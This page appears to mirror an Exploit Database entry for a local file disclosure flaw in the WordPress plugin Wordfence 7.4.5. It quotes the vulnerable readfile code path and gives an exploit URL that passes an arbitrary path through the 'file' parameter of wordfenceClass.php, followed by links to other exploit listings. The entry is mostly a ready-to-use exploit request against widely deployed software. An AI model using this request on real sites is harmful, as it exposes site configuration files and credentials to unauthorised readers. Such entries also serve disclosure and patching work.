WordPress Plugin Wordfence.7.4.5 – Local File Disclosure

Exploit Database
13 阅读

作者： Mehran Feizi

日期： 2020-02-13
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/48061/

#Tile: WordPress Plugin wordfence.7.4.5 - Local File Disclosure
#Author: mehran feizi
#Category: webapps
#Date: 2020-02-12
#vendor home page: https://wordpress.org/plugins/wordfence/

==============================================================================
Vulnerable Source:
5662: readfile readfile($localFile);
5645: $localFile = ABSPATH . preg_replace('/^(?:\.\.|[\/]+)/', '', sanitize_text_field($_GET['file']));
=================================================================================
Exploit:
localhost/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=[LFD]
=================================================================================

last Exploits
WordPress Plugin Wordfence.7.4.5 – Local File Disclosure的更多信息

RapidLeech Scripts – Arbitrary File Upload：
MMA Creative Design – SQL Injection：
Interactivefx.ie CMS – SQL Injection：
Mura CMS < 6.2 - Server-Side Request Forgery / XML External Entity Injection：
RockMongo 1.1.7 – Stored Cross-Site Scripting (XSS)：
BigTree CMS 4.2.3 – (Authenticated) SQL Injection：
Joomla! Component com_clan_members – ‘id’ SQL Injection：
Verodin Director Web Console 3.5.4.0 – Remote Authenticated Password Disclosure (PoC)：